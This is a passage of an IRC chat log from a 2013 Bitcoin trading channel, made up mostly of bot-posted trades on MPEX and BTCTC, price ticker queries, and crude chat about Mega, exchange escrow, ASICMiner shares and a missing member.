@ 0.00068842 = 2.9747 BTC [+] Feb 16 20:27:20 [MPEX] [S.MPOE] 2116 @ 0.00068846 = 1.4568 BTC [+] Feb 16 20:28:18 [BTCTC] [S.MPOE-PT] 1 @ 0.00067 BTC [+] Feb 16 20:32:18 [MPEX] [S.MPOE] 7305 @ 0.00068846 = 5.0292 BTC [+] Feb 16 20:32:20 [MPEX] [S.MPOE] 7095 @ 0.00068856 = 4.8853 BTC [+] Feb 16 20:38:13 [MPEX] [S.MPOE] 2710 @ 0.00067273 = 1.8231 BTC [-] Feb 16 20:38:14 [MPEX] [S.MPOE] 4321 @ 0.00067253 = 2.906 BTC [-] Feb 16 20:38:22 [MPEX] [S.MPOE] 8469 @ 0.00067252 = 5.6956 BTC [-] Feb 16 20:43:17 btw kimdotcom backing bitcoin https://twitter.com/KimDotcom/status/302844443223023616 Feb 16 20:44:30 [MPEX] [S.DICE] 57 @ 0.00665709 = 0.3795 BTC [+] Feb 16 20:44:32 [MPEX] [S.DICE] 2348 @ 0.00689999 = 16.2012 BTC [+] Feb 16 20:52:54 [MPEX] [S.BBET] 500 @ 0.00194988 = 0.9749 BTC [+] Feb 16 20:52:56 [MPEX] [S.BBET] 1500 @ 0.00165 = 2.475 BTC [-] Feb 16 20:52:58 [MPEX] [S.BBET] 2700 @ 0.00195 = 5.265 BTC [+] Feb 16 20:53:01 [MPEX] [S.BBET] 5000 @ 0.001955 = 9.775 BTC [+] Feb 16 20:53:03 [MPEX] [S.BBET] 5000 @ 0.00196 = 9.8 BTC [+] Feb 16 20:53:09 [MPEX] [S.BBET] 3302 @ 0.001965 = 6.4884 BTC [+] Feb 16 21:05:33 [MPEX] [S.MPOE] 11250 @ 0.00068435 = 7.6989 BTC [+] Feb 16 21:09:37 [MPEX] [S.MPOE] 4321 @ 0.00067648 = 2.9231 BTC [-] Feb 16 21:09:40 [MPEX] [S.MPOE] 2379 @ 0.00067664 = 1.6097 BTC [+] Feb 16 21:18:18 [MPEX] [S.MPOE] 5447 @ 0.00067662 = 3.6855 BTC [-] Feb 16 21:18:19 [MPEX] [S.MPOE] 153 @ 0.00067664 = 0.1035 BTC [+] Feb 16 21:25:56 28$ !! Feb 16 21:26:43 tmrw Feb 16 21:29:36 ;;ticker Feb 16 21:29:36 BTCUSD ticker | Best bid: 27.23000, Best ask: 27.23700, Bid-ask spread: 0.00700, Last trade: 27.23700, 24 hour volume: 24415.94090532, 24 hour low: 26.80750, 24 hour high: 27.50617, 24 hour vwap: 27.17259 Feb 16 21:31:14 ;;ticker m s.dice Feb 16 21:31:14 (ticker [--bid|--ask|--last|--high|--low|--avg] [--currency XXX]) -- Return pretty-printed mtgox ticker. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure that the three letter code you enter is a valid currency (1 more message) Feb 16 21:33:50 [MPEX] [S.MPOE] 8350 @ 0.00067664 = 5.6499 BTC [+] Feb 16 21:58:44 one day away and what do i see? [14:39:49] CoinBr.MPBPT-O at 0.10999... makes 0.999...% Feb 16 21:59:18 NOPE. Since it was sold around 0.1, it made 9.999% Feb 16 22:02:28 also, it's still on frontpage of bitfunder.... Feb 16 22:10:43 [MPEX] [S.MPOE] 4321 @ 0.00067253 = 2.906 BTC [-] Feb 16 22:10:44 [MPEX] [S.MPOE] 6231 @ 0.00067252 = 4.1905 BTC [-] Feb 16 22:10:46 [MPEX] [S.MPOE] 2540 @ 0.00067242 = 1.7079 BTC [-] Feb 16 22:12:22 ;;ticker Feb 16 22:12:24 BTCUSD ticker | Best bid: 27.33999, Best ask: 27.35000, Bid-ask spread: 0.01001, Last trade: 27.37997, 24 hour volume: 24475.57973389, 24 hour low: 26.80750, 24 hour high: 27.50617, 24 hour vwap: 27.18062 Feb 16 22:13:10 [MPEX] [S.MPOE] 600 @ 0.00067201 = 0.4032 BTC [-] Feb 16 22:16:22 ;;seen smickles Feb 16 22:16:23 smickles was last seen in #bitcoin-assets 1 week, 0 days, 18 hours, 5 minutes, and 44 seconds ago: pong Feb 16 22:16:29 :( Feb 16 22:16:35 hope he's not dead Feb 16 22:19:35 [MPEX] [S.MPOE] 8800 @ 0.00067214 = 5.9148 BTC [+] Feb 16 22:25:21 [MPEX] [S.MPOE] 900 @ 0.00067201 = 0.6048 BTC [-] Feb 16 22:27:29 jurov: so if I buy CoinBr.MPBPT-O at 0.10099999, March MPBOR needs to be what for me to break even? Feb 16 22:28:27 it needs to be 0.999% Feb 16 22:29:28 usagi was correct, i misread that Feb 16 22:30:39 seems to be a good deal to me Feb 16 22:31:22 [MPEX] [S.MPOE] 7600 @ 0.00067201 = 5.1073 BTC [-] Feb 16 22:31:23 [MPEX] [S.MPOE] 4315 @ 0.00066994 = 2.8908 BTC [-] Feb 16 22:35:21 yes, i'm interested myself why anyone is selling at that price :) Feb 16 22:35:31 maybe it's eskimobob Feb 16 22:37:33 [MPEX] [S.MPOE] 11700 @ 0.00067214 = 7.864 BTC [+] Feb 16 22:41:20 [MPEX] [S.MPOE] 4192 @ 0.00067214 = 2.8176 BTC [+] Feb 16 22:41:22 [MPEX] [S.MPOE] 2858 @ 0.00067663 = 1.9338 BTC [+] Feb 16 22:48:43 [BTCTC] [S.MPOE-PT] 10 @ 0.00067 = 0.0067 BTC [+] Feb 16 22:54:08 [BTCTC] [BITVPS] 10 @ 0.00449 = 0.0449 BTC [-] Feb 16 22:54:15 [MPEX] [S.MPOE] 1463 @ 0.00067663 = 0.9899 BTC [+] Feb 16 22:54:17 [MPEX] [S.MPOE] 7018 @ 0.00067664 = 4.7487 BTC [+] Feb 16 22:54:22 [MPEX] [S.MPOE] 719 @ 0.00067966 = 0.4887 BTC [+] Feb 16 22:57:39 [MPEX] [S.MPOE] 3031 @ 0.00067966 = 2.06 BTC [+] Feb 16 22:57:41 [MPEX] [S.MPOE] 6886 @ 0.00068019 = 4.6838 BTC [+] Feb 16 23:03:11 [HAVELOCK] [KCIM] 3 @ 0.99 = 2.97 BTC [-] Feb 16 23:15:58 [BTCTC] [S.MPOE-PT] 100 @ 0.00067 = 0.067 BTC [+] Feb 16 23:19:57 [MPEX] [S.MPOE] 1214 @ 0.00068019 = 0.8258 BTC [+] Feb 16 23:19:59 [MPEX] [S.MPOE] 6696 @ 0.00068649 = 4.5967 BTC [+] Feb 16 23:20:03 [MPEX] [S.MPOE] 2905 @ 0.00068856 = 2.0003 BTC [+] Feb 16 23:20:05 [MPEX] [S.MPOE] 2285 @ 0.00068894 = 1.5742 BTC [+] Feb 16 23:22:05 [MPEX] [S.MPOE] 4321 @ 0.00067628 = 2.9222 BTC [-] Feb 16 23:22:07 [MPEX] [S.MPOE] 3479 @ 0.00067625 = 2.3527 BTC [-] Feb 16 23:27:07 usagi was last seen in #bitcoin-assets 7 hours, 40 minutes, and 5 seconds ago: so if the underlying bond then returns 5% you get back 0.105 Feb 16 23:33:32 [MPEX] [S.MPOE] 5371 @ 0.00067625 = 3.6321 BTC [-] Feb 16 23:33:33 [MPEX] [S.MPOE] 3711 @ 0.00066994 = 2.4861 BTC [-] Feb 16 23:33:34 [MPEX] [S.MPOE] 3187 @ 0.00066956 = 2.1339 BTC [-] Feb 16 23:33:38 [MPEX] [S.MPOE] 2481 @ 0.00066832 = 1.6581 BTC [-] Feb 16 23:36:48 [MPEX] [S.MPOE] 3219 @ 0.00066832 = 2.1513 BTC [-] Feb 16 23:36:49 [MPEX] [S.MPOE] 6756 @ 0.00066776 = 4.5114 BTC [-] Feb 16 23:36:51 [MPEX] [S.MPOE] 8600 @ 0.00066681 = 5.7346 BTC [-] Feb 16 23:36:52 [MPEX] [S.MPOE] 1800 @ 0.00066536 = 1.1976 BTC [-] Feb 16 23:39:46 [MPEX] [S.MPOE] 5383 @ 0.00066216 = 3.5644 BTC [-] Feb 16 23:55:10 [MPEX] [S.MPOE] 5157 @ 0.0006576 = 3.3912 BTC [-] Feb 16 23:55:11 [MPEX] [S.MPOE] 5985 @ 0.00065748 = 3.935 BTC [-] Feb 16 23:55:14 [MPEX] [S.MPOE] 8000 @ 0.00065703 = 5.2562 BTC [-] Feb 16 23:55:16 [MPEX] [S.MPOE] 8658 @ 0.000657 = 5.6883 BTC [-] Feb 16 23:58:17 [MPEX] [S.MPOE] 1800 @ 0.000657 = 1.1826 BTC [-] Feb 17 00:00:00 [BTCTC] [S.MPOE-PT] 100 @ 0.00067 = 0.067 BTC [+] Feb 17 00:07:12 [MPEX] [S.MPOE] 5557 @ 0.00066216 = 3.6796 BTC [+] Feb 17 00:08:36 http://bitcoinmagazine.com/mega-sidesteps-us-state-censorship-with-bitcoin/ Feb 17 00:13:30 [MPEX] [S.MPOE] 10400 @ 0.000657 = 6.8328 BTC [-] Feb 17 00:14:18 what the fuck Feb 17 00:15:57 dude is beyond retarded Feb 17 00:16:10 They accused Megaupload owner Kim Dotcom of a number of criminal indictments and begun a legal case. Feb 17 00:16:16 ENGLISH motherfucker Feb 17 00:17:57 is anyone's name on that article? Feb 17 00:18:04 "Bitcoin is more than drugs, sex and criminal gangsters. " Feb 17 00:18:08 its amir Feb 17 00:18:16 (of course) Feb 17 00:18:27 are you fucking kidding me? Feb 17 00:18:34 the official drooling mouthbreather of bitcoin pr Feb 17 00:18:35 no shit Feb 17 00:19:52 i've not heard of bitvoucher Feb 17 00:20:58 amir is now writing for bitcoinrag ? Feb 17 00:21:05 this is strangely fitting. Feb 17 00:21:50 http://unsystem.net/static/ppl/taaki.jpg Feb 17 00:22:17 [MPEX] [S.DICE] 150 @ 0.0066063 = 0.9909 BTC [-] Feb 17 00:22:18 [MPEX] [S.DICE] 29 @ 0.00654141 = 0.1897 BTC [-] Feb 17 00:23:01 you can actually see the stupid in his face in that shot Feb 17 00:23:12 [MPEX] [S.MPOE] 4142 @ 0.000657 = 2.7213 BTC [-] Feb 17 00:23:18 [MPEX] [S.MPOE] 1500 @ 0.00065642 = 0.9846 BTC [-] Feb 17 00:23:19 [MPEX] [S.MPOE] 9558 @ 0.00065621 = 6.2721 BTC [-] Feb 17 00:23:52 i like the door. Feb 17 00:23:52 ok bitvoucher just sells the megaupload codes, https://zipbit.co/ takes their bitcoin Feb 17 00:25:13 mircea_popescu: iirc him and the interscamgo set were in with vlad from teh start? Feb 17 00:25:34 can i buy any mega shares? :P Feb 17 00:25:35 i don't think the minions (taaki, vlad, whatgever) are in with anyone particularly. Feb 17 00:25:37 they just do what told. Feb 17 00:26:28 meh, I tuned out after they published teh first cover Feb 17 00:26:35 Currently, only New Zealand and Bermuda merchants can use zipbit's services Feb 17 00:26:55 thats like, 18 people? Feb 17 00:26:59 no Australians? Feb 17 00:27:01 wtf? Feb 17 00:29:52 mircea_popescu: kimdotcom has his own rota http://www.fscl.org.nz/ Feb 17 00:31:06 lol except his is stupid and fat. Feb 17 00:31:35 that is KDCs? Feb 17 00:31:41 so basically zipbit's patrick harnett's secret grinch project Feb 17 00:31:51 dub ya Feb 17 00:32:02 clickt "list of participants and its 403 forbidden Feb 17 00:32:05 citation needed Feb 17 00:34:11 [MPEX] [S.MPOE] 11335 @ 0.00066216 = 7.5056 BTC [+] Feb 17 00:34:12 [MPEX] [S.MPOE] 2965 @ 0.00067449 = 1.9999 BTC [+] Feb 17 00:34:21 Trevor Slater, General Manager Feb 17 00:34:44 , ceo Feb 17 00:34:51 Susan Taylor Feb 17 00:35:23 sorry, i'll take a break Feb 17 00:36:08 fuck it is patrick Feb 17 00:37:06 Trendon did say he was "working for Bitcoin" too Feb 17 00:37:38 those people worked for the govt banking disputes resolution scheme, unlikely to be mega shills Feb 17 00:37:45 pretty soon the scammers allied with the idiots will dominate everything Feb 17 00:37:53 no they are his rota Feb 17 00:38:16 where is the link? Feb 17 00:38:17 Bruce Wagner, Human Resources Feb 17 00:39:06 Jonathan Ryan Owens, Marketing Feb 17 00:39:30 this has got to be a joke Feb 17 00:39:52 whats jokey about it? Feb 17 00:40:02 [MPEX] [S.MPOE] 5400 @ 0.00065785 = 3.5524 BTC [-] Feb 17 00:40:04 cause bruce is better at marketing Feb 17 00:40:04 [MPEX] [S.MPOE] 2000 @ 0.00065621 = 1.3124 BTC [-] Feb 17 00:40:27 but he gets to hire the interns this way Feb 17 00:41:33 xD Feb 17 00:41:44 fscl just looks like an advisory service for ombudsman cases Feb 17 00:42:30 financial ambulance chasers Feb 17 00:43:31 rota Feb 17 00:43:38 well no Feb 17 00:43:55 its nothing like that at all from first glance Feb 17 00:43:57 [MPEX] [S.MPOE] 5335 @ 0.00067449 = 3.5984 BTC [+] Feb 17 00:43:59 [MPEX] [S.MPOE] 4321 @ 0.00068034 = 2.9397 BTC [+] Feb 17 00:44:01 [MPEX] [S.MPOE] 1800 @ 0.00068035 = 1.2246 BTC [+] Feb 17 00:44:02 [MPEX] [S.MPOE] 2925 @ 0.00068254 = 1.9964 BTC [+] Feb 17 00:44:16 FSCL is an independent not-for-profit External Dispute Resolution (EDR) scheme Feb 17 00:44:28 they take your case to the DRS and clip the ticket Feb 17 00:45:07 http://www.fscl.org.nz/faq.php scope is the same as the actual service Feb 17 00:45:11 er http://www.cab.org.nz/vat/money/bit/Pages/TheBankingOmbudsman.aspx Feb 17 00:47:27 [BTCTC] [COGNITIVE] 2 @ 0.331 = 0.662 BTC [-] Feb 17 00:47:32 truffles: no, this is where you make a complaint against patrick harnett, he recuses himself and his friends say he should nake some token gesture and be cleared Feb 17 00:50:58 borrowed tons of money at super-high rates, had his own "credit rating agency" that said all these stoners were "no risk", ran a passthrogh to ponzi@40, Feb 17 00:52:09 [BTCTC] [S.MPOE-PT] 5000 @ 0.00067 = 3.35 BTC [+] Feb 17 00:52:36 made an agreement with mircea_popescu to invest someof his money in his lending business that would not be in pirate, flat out lied and everyone in that security that mp ran an etf that held some, they all lost Feb 17 00:53:14 right he was in MPCDO or whatever? Feb 17 01:15:15 [BTCTC] [GSDPT] 7 @ 0.00626 = 0.0438 BTC [+] Feb 17 01:23:45 https://sites.google.com/a/bitcoin2012.com/homepage/_/rsrc/1332304086483/config/logo-medium.png Feb 17 01:25:07 do you like that one, or this one https://sites.google.com/a/bitcoin2012.com/homepage/_/rsrc/1343922718967/config/ad_bdt.jpg Feb 17 01:25:45 both suck Feb 17 01:26:03 soz Feb 17 01:26:09 1st one sucks less Feb 17 01:26:19 oh, your more of a https://sites.google.com/a/bitcoin2012.com/homepage/_/rsrc/1332293239618/config/intersango.png guy? Feb 17 01:29:48 lmao what is this, the logo cemetery ? Feb 17 01:30:54 https://s-media-cache-ec1.pinimg.com/550x/8f/fe/7c/8ffe7ca82beb62232e47f511294c8f8e.jpg Feb 17 01:31:21 i have these in hi-res if you want them for printing high quality posters Feb 17 01:31:26 https://s-media-cache-ec5.pinimg.com/550x/32/b8/3f/32b83feb0ae476de8bcea0c82126d014.jpg Feb 17 01:31:46 a.... a gir ?! Feb 17 01:32:08 photochop am i rite ? Feb 17 01:34:38 https://s-media-cache-ec9.pinimg.com/550x/31/49/e0/3149e02cc3eff69ea2731d8fd0fcc1d8.jpg Feb 17 01:35:22 i'll stop, but i like to share Feb 17 01:35:32 https://s-media-cache-ec4.pinimg.com/550x/97/a8/42/97a84201ac7873ff91a3dcfaf069055a.jpg Feb 17 01:35:51 like someone is selfposting Feb 17 01:35:52 :p Feb 17 01:57:02 [MPEX] [S.MPOE] 4321 @ 0.00065921 = 2.8484 BTC [-] Feb 17 01:57:06 [MPEX] [S.MPOE] 6579 @ 0.00065906 = 4.336 BTC [-] Feb 17 01:59:26 [MPEX] [S.MPOE] 2671 @ 0.00065906 = 1.7603 BTC [-] Feb 17 01:59:28 [BTCTC] [S.MPOE-PT] 31448 @ 0.00067 = 21.0702 BTC [+] Feb 17 01:59:38 [BTCTC] [S.MPOE-PT] 1 @ 0.00069 BTC [+] Feb 17 02:00:13 [BTCTC] [S.MPOE-PT] 1000 @ 0.0007 = 0.7 BTC [+] Feb 17 02:00:39 [BTCTC] [S.MPOE-PT] 10 @ 0.00078 = 0.0078 BTC [+] Feb 17 02:00:47 [BTCTC] [S.MPOE-PT] 3 @ 0.00079 = 0.0024 BTC [+] Feb 17 02:03:17 anyone got any info on how to actually make money using mpex.co? Feb 17 02:03:29 like any info on or around the subject Feb 17 02:04:49 zanz: I made 0.4 BTC (or 1.4 BTC, depending on how you count) using MPEX Feb 17 02:05:04 zanz, you buy stuff low and sell high, or you buy and hold and receive monthly dividends, or you buy and sell puts and calls on the price of bitcoin Feb 17 02:05:05 zanz: details here: http://www.loper-os.org/?p=1108 Feb 17 02:05:59 ah yes, my days of the eve stock exchange have come back to me. how big is it atm? cheers for the good responses by the way Feb 17 02:06:18 zanz ideally you buy low and sell high Feb 17 02:06:59 if you catch bugpowder online sometime you could probably bug him for tips, i think he's one of the more successful traders Feb 17 02:08:25 cheers bud. see reddit is now accepting bitcoins... Feb 17 02:11:17 how's your learn japanese site usagi? Feb 17 02:11:27 silvery. Feb 17 02:12:02 stop being poops Feb 17 02:12:07 will someone buy me food for btc Feb 17 02:12:59 [BTCTC] [BTC-BOND] 1 @ 0.00999 BTC [+] Feb 17 02:13:46 mircea_popescu: buy me food lol Feb 17 02:14:03 you know i've never used a credit card online ? Feb 17 02:17:51 no Feb 17 02:19:19 [BTCTC] [S.DICE-PT] 300 @ 0.0063 = 1.89 BTC [+] Feb 17 02:19:51 ;;ticker Feb 17 02:19:52 BTCUSD ticker | Best bid: 27.38000, Best ask: 27.39978, Bid-ask spread: 0.01978, Last trade: 27.14000, 24 hour volume: 18524.25762086, 24 hour low: 26.80750, 24 hour high: 27.49989, 24 hour vwap: 27.16598 Feb 17 02:19:53 ;;seen smickles Feb 17 02:19:53 smickles was last seen in #bitcoin-assets 1 week, 0 days, 22 hours, 9 minutes, and 15 seconds ago: pong Feb 17 02:20:00 :( Feb 17 02:20:05 [BTCTC] [S.MPOE-PT] 8 @ 0.00079 = 0.0063 BTC [+] Feb 17 02:20:24 mircea_popescu: have you heard from smickles outside the channel (email/anything else) I'm slightly worried. Feb 17 02:20:34 nope. Feb 17 02:20:48 should I be worried? Feb 17 02:20:55 that the assassins have been dispatched? Feb 17 02:20:59 hm. Feb 17 02:21:08 afaik his wife was due sometime this spring Feb 17 02:21:13 maybe he had an early surprise. Feb 17 02:21:31 did you try emailing him ? Feb 17 02:22:18 Not as of yet. I don't need anything, I was just hoping he was okay. Feb 17 02:22:44 his blog was reset Feb 17 02:23:00 [MPEX] [S.MPOE] 18750 @ 0.00065792 = 12.336 BTC [-] Feb 17 02:23:01 [MPEX] [S.MPOE] 2842 @ 0.00065621 = 1.8649 BTC [-] Feb 17 02:23:02 [MPEX] [S.MPOE] 358 @ 0.00065554 = 0.2347 BTC [-] Feb 17 02:23:16 what was his blog again ? Feb 17 02:23:41 something mostofmany Feb 17 02:24:21 http://blog.smickles.com/bitcoin/btc-is-scammed-about-as-much-as-usd/ Feb 17 02:24:27 o yea Feb 17 02:24:28 hm Feb 17 02:25:21 not him http://sm.ickl.es/ Feb 17 02:25:23 did he take the money and run? I would hate to insinuate as much. Feb 17 02:26:05 he's not been around for about 2 weeks, that's not unprecedented for him Feb 17 02:26:37 oh my i dont know about money and communication Feb 17 02:27:00 if he is your broker and didnt say anything and gone for 2 weeks thats different Feb 17 02:27:09 so email him Feb 17 02:27:48 right assuming he's not answered your emails Feb 17 02:29:11 i dunno that he's had that much money to run with anyway Feb 17 02:29:28 he certainly had hundreds of my btcs at various past points (none atm) Feb 17 02:30:55 nah unofficial broker Feb 17 02:31:03 I just hope the assassins weren't dispatched Feb 17 02:31:07 and the feds got to him or something Feb 17 02:31:15 since we're american and we can be killed at any time :P Feb 17 02:31:47 dude get out Feb 17 02:32:06 life's not quite as cinematic as all that Feb 17 02:32:28 Hahahaha Feb 17 02:43:08 [MPEX] [S.MPOE] 7900 @ 0.00065681 = 5.1888 BTC [+] Feb 17 02:43:10 [MPEX] [S.MPOE] 13550 @ 0.00065806 = 8.9167 BTC [+] Feb 17 02:44:07 [BTCTC] [GSDPT] 372 @ 0.00637 = 2.3696 BTC [+] Feb 17 02:45:47 [MPEX] [S.DICE] 1509 @ 0.00654141 = 9.871 BTC [-] Feb 17 02:46:23 [MPEX] [S.MPOE] 17142 @ 0.00065554 = 11.2373 BTC [-] Feb 17 02:46:23 [MPEX] [S.MPOE] 14676 @ 0.00065526 = 9.6166 BTC [-] Feb 17 03:03:49 [MPEX] [S.MPOE] 3000 @ 0.00065806 = 1.9742 BTC [+] Feb 17 03:08:18 [MPEX] [S.MPOE] 2674 @ 0.00065526 = 1.7522 BTC [-] Feb 17 03:08:20 [MPEX] [S.MPOE] 10757 @ 0.0006552 = 7.048 BTC [-] Feb 17 03:08:22 [MPEX] [S.MPOE] 8800 @ 0.00065493 = 5.7634 BTC [-] Feb 17 03:08:23 [MPEX] [S.MPOE] 5353 @ 0.00065485 = 3.5054 BTC [-] Feb 17 03:08:25 [MPEX] [S.MPOE] 16200 @ 0.00065476 = 10.6071 BTC [-] Feb 17 03:08:26 [MPEX] [S.MPOE] 13650 @ 0.00065465 = 8.936 BTC [-] Feb 17 03:08:28 [MPEX] [S.MPOE] 3000 @ 0.00065447 = 1.9634 BTC [-] Feb 17 03:08:30 [MPEX] [S.MPOE] 1109 @ 0.00065445 = 0.7258 BTC [-] Feb 17 03:08:32 [MPEX] [S.MPOE] 15250 @ 0.00065261 = 9.9523 BTC [-] Feb 17 03:08:33 [MPEX] [S.MPOE] 3000 @ 0.0006519 = 1.9557 BTC [-] Feb 17 03:08:34 [MPEX] [S.MPOE] 10208 @ 0.00065072 = 6.6425 BTC [-] Feb 17 03:08:38 [MPEX] [S.MPOE] 2853 @ 0.00064875 = 1.8509 BTC [-] Feb 17 03:08:40 [MPEX] [S.MPOE] 3300 @ 0.00064838 = 2.1397 BTC [-] Feb 17 03:08:44 [MPEX] [S.MPOE] 1246 @ 0.0006466 = 0.8057 BTC [-] Feb 17 03:14:43 https://www.bitmit.net/en/item/16917-secret-autowin-satoshidice-address-shhh-only-posting-this-once Feb 17 03:14:58 [BTCTC] [GSDPT] 3 @ 0.00639 = 0.0192 BTC [+] Feb 17 03:15:00 [BTCTC] [GSDPT] 47 @ 0.00639 = 0.3003 BTC [+] Feb 17 03:15:36 [BTCTC] [S.DICE-PT] 700 @ 0.0063 = 4.41 BTC [+] Feb 17 03:32:27 listen very carefully I shall post this only once Feb 17 03:32:39 zee train was bummed Feb 17 03:44:41 http://thenextweb.com/insider/2013/02/16/mega-update-dotcoms-service-now-accepts-bitcoin-will-expand-into-email-chat-voice-video-and-mobile/ Feb 17 03:48:25 dude what service, seriously. Feb 17 03:48:27 nobody cares. Feb 17 03:48:39 siome fat fuck nobody cares about trying to hang on so the spotlight. Feb 17 04:04:49 who ever makes the grubhub of bitcoin will be very rich Feb 17 04:05:31 !ticker m S.MPOE Feb 17 04:05:33 [MPEX:S.MPOE] 1D: 0.0006466 / 0.00066815 / 0.00068894 (1489738 shares, 995.38 BTC), 7D: 0.0006153 / 0.00064431 / 0.00068894 (13311812 shares, 8,577.03 BTC), 30D: 0.00059445 / 0.00066235 / 0.0007 (74869311 shares, 49,589.96 BTC) Feb 17 04:05:56 ;;bc,diff Feb 17 04:05:57 3275464.5865656 Feb 17 04:06:07 ;;bc,next Feb 17 04:06:08 Error: "bc,next" is not a valid command. Feb 17 04:06:12 ;;bc,nb Feb 17 04:06:13 Error: "bc,nb" is not a valid command. Feb 17 04:06:16 ;;bc,nextblock Feb 17 04:06:17 Error: "bc,nextblock" is not a valid command. Feb 17 04:06:21 :( Feb 17 04:07:27 about 3.6 Feb 17 04:42:48 what exchanges to buy/sell btc do you use? Feb 17 04:43:01 first, fuck coinbase, second, what exchanges do you use? Feb 17 04:43:06 [MPEX] [S.MPOE] 4171 @ 0.0006466 = 2.697 BTC [-] Feb 17 04:43:10 i only want to hold, but I want my accounts set up for the future Feb 17 04:46:00 [BTCTC] [S.DICE-PT] 1904 @ 0.0063 = 11.9952 BTC [+] Feb 17 04:54:12 [MPEX] [S.DICE] 200 @ 0.00671476 = 1.343 BTC [+] Feb 17 04:55:44 2000 asic miners shares for sale now before i list them on the forum pm me if interested. Feb 17 04:57:10 [MPEX] [S.MPOE] 4321 @ 0.00064581 = 2.7905 BTC [-] Feb 17 04:57:12 [MPEX] [S.MPOE] 5077 @ 0.0006458 = 3.2787 BTC [-] Feb 17 04:57:14 [MPEX] [S.MPOE] 3767 @ 0.00064571 = 2.4324 BTC [-] Feb 17 05:01:31 who wants to be an escrow for 800 plus btc? :) Feb 17 05:01:40 fee? Feb 17 05:01:55 haha, what is the going rate? Feb 17 05:02:03 dunno Feb 17 05:02:09 also do you have a forum account? Feb 17 05:02:17 ya Feb 17 05:02:33 what does a forum account have to do with this Feb 17 05:02:49 ill be having an auction on the forum Feb 17 05:02:57 so the noobs will have to trust you Feb 17 05:03:19 what are you selling? Feb 17 05:04:28 2000 asic miner shares Feb 17 05:04:37 i expect to bring in 800 plus btc Feb 17 05:04:50 no one wants to buy in bulk so far Feb 17 05:04:53 how are they being dlivered? Feb 17 05:04:57 delivered? Feb 17 05:05:19 [MPEX] [S.MPOE] 4321 @ 0.00064624 = 2.7924 BTC [+] Feb 17 05:05:21 [MPEX] [S.MPOE] 12056 @ 0.00064649 = 7.7941 BTC [+] Feb 17 05:05:57 when friedcat hands then out, i send to their account and then i get the btc from escrow Feb 17 05:06:12 i assume that is what the others are doing Feb 17 05:06:26 how is he handing out? Feb 17 05:06:35 there must be a good way to verify delivery Feb 17 05:06:37 he is going to list it Feb 17 05:06:57 honestly i dont know, but this is how the others are doing it Feb 17 05:07:01 [MPEX] [S.MPOE] 912 @ 0.00064649 = 0.5896 BTC [+] Feb 17 05:07:02 [MPEX] [S.MPOE] 400 @ 0.00065806 = 0.2632 BTC [+] Feb 17 05:07:07 [MPEX] [S.MPOE] 11479 @ 0.00065829 = 7.5565 BTC [+] Feb 17 05:07:08 [MPEX] [S.MPOE] 13009 @ 0.00065933 = 8.5772 BTC [+] Feb 17 05:07:27 if nothing else ill just tell friedcat who bought what, i asked him about my saelling it and he okayed it Feb 17 05:08:16 are those bonds going to be publicly traded? Feb 17 05:08:26 yes, soon Feb 17 05:08:26 on an exchange Feb 17 05:08:30 which one? Feb 17 05:08:36 i dont know lol Feb 17 05:08:45 jeez. Feb 17 05:08:49 why you want to buy them? :) Feb 17 05:09:01 dunno if. Feb 17 05:09:22 but if you want me to do escrow i have to know how its going down Feb 17 05:09:41 yeah, there are some things that have not been answered by friedcat Feb 17 05:09:53 he is working on the asics and well no one really seems to care Feb 17 05:21:21 [MPEX] [S.MPOE] 2361 @ 0.00064582 = 1.5248 BTC [-] Feb 17 05:21:31 [MPEX] [S.MPOE] 424 @ 0.00064571 = 0.2738 BTC [-] Feb 17 05:24:49 so apparently someone's blasting btc-e off da internets. Feb 17 05:26:42 yeah mp it has been going on for a few days Feb 17 05:26:49 i only have 20 btc left with them now Feb 17 05:26:54 the novacoin drama ? Feb 17 05:27:00 i hope so Feb 17 05:27:18 i like btc-e Feb 17 05:27:27 i trust them not to work with dea/fbi cia Feb 17 05:27:47 [MPEX] [S.MPOE] 4321 @ 0.00065927 = 2.8487 BTC [+] Feb 17 05:27:49 [MPEX] [S.MPOE] 6341 @ 0.00065933 = 4.1808 BTC [+] Feb 17 05:27:51 [MPEX] [S.MPOE] 5587 @ 0.0006633 = 3.7059 BTC [+] Feb 17 05:35:01 why, just cause they're russians or w.e ? Feb 17 05:42:42 yeah russian cyber criminals Feb 17 05:42:50 they use btc-e to launder their money... Feb 17 05:43:05 also the best use of alt coins ever... Feb 17 05:53:01 [MPEX] [S.MPOE] 4321 @ 0.00064587 = 2.7908 BTC [-] Feb 17 05:53:02 [MPEX] [S.MPOE] 6402 @ 0.00064571 = 4.1338 BTC [-] Feb 17 06:04:19 oh this fucking forum Feb 17 06:04:34 its not like they dont have piles of btc to pay for shit that works Feb 17 06:09:27 [MPEX] [S.MPOE] 607 @ 0.00064571 = 0.3919 BTC [-] Feb 17 06:09:29 [MPEX] [S.MPOE] 4321 @ 0.00064553 = 2.7893 BTC [-] Feb 17 06:09:31 [MPEX] [S.MPOE] 16850 @ 0.00064552 = 10.877 BTC [-] Feb 17 06:09:32 [MPEX] [S.MPOE] 1186 @ 0.000643 = 0.7626 BTC [-] Feb 17 06:10:14 lol i highly doubt it Feb 17 06:12:35 https://bitcointalk.org/index.php?topic=144574.0 oh lol type in the title Feb 17 06:12:37 typo Feb 17 06:16:02 [MPEX] [S.MPOE] 4321 @ 0.00065073 = 2.8118 BTC [+] Feb 17 06:16:06 [MPEX] [S.MPOE] 15150 @ 0.00065103 = 9.8631 BTC [+] Feb 17 06:22:58 Isn't there like a 2700 btc bounty for new forum software? Feb 17 06:23:27 thats one expensive forum Feb 17 06:25:57 http://wedge.org/pub/off/7386/bitcointalk-org-$11k-bounty-for-new-forum-software/ Feb 17 06:29:55 yeah it is stupid how high it is Feb 17 06:30:05 maybe theymos will kill it and run off with the money Feb 17 06:30:11 [MPEX] [S.MPOE] 17723 @ 0.00066085 = 11.7122 BTC [+] Feb 17 06:30:21 forum is more or less dead now Feb 17 06:41:37 [MPEX] [S.MPOE] 2148 @ 0.00066085 = 1.4195 BTC [+] Feb 17 06:47:29 [MPEX] [S.MPOE] 34 @ 0.00066085 = 0.0225 BTC [+] Feb 17 06:58:12 what charting software is good? Feb 17 06:58:46 i like multicharts Feb 17 07:00:32 [MPEX] [S.MPOE] 4321 @ 0.00064333 = 2.7798 BTC [-] Feb 17 07:00:34 [MPEX] [S.MPOE] 1579 @ 0.00064332 = 1.0158 BTC [-] Feb 17 07:00:46 thx broom, i'll look it up. Feb 17 07:04:02 anyone selling xrp? Feb 17 07:07:26 check offers in 